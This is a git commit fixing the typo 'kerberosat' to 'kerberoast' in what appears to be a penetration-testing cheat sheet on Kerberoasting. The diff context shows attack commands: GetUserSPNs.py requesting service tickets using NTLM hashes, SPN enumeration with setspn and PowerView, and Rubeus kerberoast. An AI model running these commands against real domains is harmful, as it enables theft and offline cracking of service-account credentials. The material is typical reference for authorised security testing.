Fix typo from "kerberosat" to "kerberoast"

This commit is contained in:
Ally Petitt 2022-10-10 16:25:09 -07:00 committed by GitHub
parent bd0b87e02c
commit 09291a1571
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -52,7 +52,7 @@ GetUserSPNs.py -request -dc-ip 192.168.2.160 -hashes <LMHASH>:<NTHASH> <DOMAIN>/
# Get Kerberoastable users
setspn.exe -Q */* #This is a built-in binary. Focus on user accounts
Get-NetUser -SPN | select serviceprincipalname #Powerview
.\Rubeus.exe kerberosat /stats
.\Rubeus.exe kerberoast /stats
```
* **Technique 1: Ask for TGS and dump it from memory**